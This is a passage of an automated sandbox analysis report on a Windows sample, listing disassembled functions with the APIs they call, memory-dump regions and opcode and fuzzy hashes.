                    • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                    • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                    • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                    • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                    Function 00B07DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ComputerName
                    • String ID:
                    • API String ID: 3545744682-0
                    • Opcode ID: 9f2105e45e93ce964b8f5a36561a6c3adc96587229b2a1b845b9796bf3bd6c93
                    • Instruction ID: dea3b4b053af8c982c19e6a86f1e72179f9a7c61185683217c05bd6b5c059823
                    • Opcode Fuzzy Hash: 9f2105e45e93ce964b8f5a36561a6c3adc96587229b2a1b845b9796bf3bd6c93
                    • Instruction Fuzzy Hash: 0121F1F0ECD3446FDA3556149C06FB5FEE4EF61B10F8846EAB588161E2DD647D088263
                    Function 0040434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00404370
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: IconNotifyShell_$_memset
                    • String ID:
                    • API String ID: 1505330794-0
                    • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                    • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                    • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                    • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                    Function 0042571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __FF_MSGBANNER.LIBCMT ref: 00425733
                      • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                      • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                    • __NMSG_WRITE.LIBCMT ref: 0042573A
                      • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                      • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                      • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                      • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                    • RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                    • String ID:
                    • API String ID: 1372826849-0
                    • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                    • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                    • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                    • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                    Function 004698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                    • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                    • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: File$CloseCreateHandleTime
                    • String ID:
                    • API String ID: 3397143404-0
                    • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                    • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                    • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                    • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                    Function 00468D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00468D1B
                      • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                      • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                    • _free.LIBCMT ref: 00468D2C
                    • _free.LIBCMT ref: 00468D3E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: ca4aeb20cc18b172a2b301ecc852c49215d3c1f999f8f195bb222a4262111412
                    • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                    • Opcode Fuzzy Hash: ca4aeb20cc18b172a2b301ecc852c49215d3c1f999f8f195bb222a4262111412
                    • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                    Function 0040A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID: CALL
                    • API String ID: 0-4196123274
                    • Opcode ID: 7c4522afcc273417d4d8c93b72e25257d5254b3c436acfa90849ee5902d5bb5e
                    • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                    • Opcode Fuzzy Hash: 7c4522afcc273417d4d8c93b72e25257d5254b3c436acfa90849ee5902d5bb5e
                    • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                    Function 00465B7A Relevance: 3.1, APIs: 2, Instructions: 142COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 00465B93
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: BuffCharLower
                    • String ID:
                    • API String ID: 2358735015-0
                    • Opcode ID: b313abd93a3c89839d601e5652de73f9a51ced68dd4fda3e40e6ac1f928fdb91
                    • Instruction ID: ca699bb1c278210e2bea96785600e82950db412e583262dd6e63fce83db42ac8
                    • Opcode Fuzzy Hash: b313abd93a3c89839d601e5652de73f9a51ced68dd4fda3e40e6ac1f928fdb91
                    • Instruction Fuzzy Hash: 0441A2B2500709AFDB11DF65C8809AFB3B8EB44314F10862FE956D7281EB78AE01CB55
                    Function 004677B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 00b6a16159f735a3c12135094c92ccfe771db5f98c44acd5d958ee256f2e2c9e
                    • Instruction ID: 665aeeeda7618be144ab26ba5ea9c3b14b1a5e971dff4faecb2a1d88e99e5761
                    • Opcode Fuzzy Hash: 00b6a16159f735a3c12135094c92ccfe771db5f98c44acd5d958ee256f2e2c9e
                    • Instruction Fuzzy Hash: 8841D7716082059BCB10FFA9D8859BAB7E8EF49308B64445FE14597382EF3D9C05CB6A
                    Function 00AE5A3B Relevance: 3.1, APIs: 2, Instructions: 61threadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateThread.KERNEL32(00000000,00000000,00AE55C0,?,00000000,00000000), ref: 00AE5A51
                    • RtlExitUserThread.NTDLL(00000000), ref: 00AE5B11
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Thread$CreateExitUser
                    • String ID:
                    • API String ID: 4108186749-0
                    • Opcode ID: 3f1f053f16ba8aba2f251c4034cec7d42268b25d08dbaeada75da9f8eed2cb01
                    • Instruction ID: 4c0e890f41b165d1405dfb9384ffdda4ba42f96ee39974d860ac71d66c7052f7
                    • Opcode Fuzzy Hash: 3f1f053f16ba8aba2f251c4034cec7d42268b25d08dbaeada75da9f8eed2cb01
                    • Instruction Fuzzy Hash: FB113D11D0DBC14ED723877A68753666FA01FA3738F1D06DAD0908E0E3D2995D0D93A3
                    Function 004047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                    Download Yara Rule
                    APIs
                    • IsThemeActive.UXTHEME ref: 00404834
                      • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                      • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                      • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                      • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                      • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                      • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                      • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                      • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                      • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 1438897964-0
                    • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                    • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                    • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                    • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                    Function 00405C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 00405CC7
                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 0043DD73
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                    • Instruction ID: 3e9ad2372c7cfb2b297ed5c82f770502f6fc7a31e1f40b0728b8e52e39df89fe
                    • Opcode Fuzzy Hash: aed05ab6a1b88559d57bbe8f1293197c90d85f92c05dbd21c07c0e87b90c3386
                    • Instruction Fuzzy Hash: 9A018870144708BEF7201E24CC8AF673ADCEB05768F10832AFAD56A1D0C6B81C458F58
                    Function 00420DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                      • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                      • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00B80000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                    • std::exception::exception.LIBCMT ref: 00420DEC
                    • __CxxThrowException@8.LIBCMT ref: 00420E01
                      • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                    • Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
                    • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                    • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                    Function 004255FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                    • Instruction ID: eb59cd814e1449f2521413b7bdb600bd306f3e119aeaedc73612e9d55c5f6ff2
                    • Opcode Fuzzy Hash: ba8f5e451a8ec4a75135d94e347059916301475a1d87ff8d947c1e1db94b3a7d
                    • Instruction Fuzzy Hash: B901D871A01624ABCF21AF66BC0259F7B61AF50325FD0411FB81817251DB398551DF59
                    Function 004253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                    • __lock_file.LIBCMT ref: 004253EB
                      • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                    • __fclose_nolock.LIBCMT ref: 004253F6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                    • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                    • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                    • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                    Function 00408061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 0040807A
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 004080AD
                      • Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$_memmove
                    • String ID:
                    • API String ID: 3033907384-0
                    • Opcode ID: c81d0131ee7ad705754dbe13e631e1a2bdd3df71c0580d00e1d0387577788cfc
                    • Instruction ID: be71039b59a243880f73e1074d907fcebe79c3230fd69eb509900504ef28c21c
                    • Opcode Fuzzy Hash: c81d0131ee7ad705754dbe13e631e1a2bdd3df71c0580d00e1d0387577788cfc
                    • Instruction Fuzzy Hash: C9018F31201114BEEB246B22DD4AF7B3B6DEF85360F10803EF905DE2D1DE34A8009679
                    Function 00AE5D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                    Download Yara Rule
                    APIs
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00AE5D6D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FreeVirtual
                    • String ID:
                    • API String ID: 1263568516-0
